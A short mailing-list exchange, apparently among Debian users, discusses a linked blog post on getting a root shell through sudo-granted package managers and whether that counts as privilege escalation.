❦ 12 August 2021 10:39 +05, Andrey Rahmatullin:
I just ran across this article
https://blog.ikuamike.io/posts/2021/package_managers_privesc/ I tested
the attacks on Debian 11 and they work successfully giving me a root
shell prompt.
I don't think calling this "privilege escalation" or "attack" is correct.
The premise of the post is "the user should not be a root/admin user but
has been assigned sudo permissions to run the package manager" and one
doesn't really need a long article to prove that it's not secure.
I think the article is interesting nonetheless. Some people may think
that granting sudo on apt is OK. In the past, I think "apt install
./something.deb" was not possible.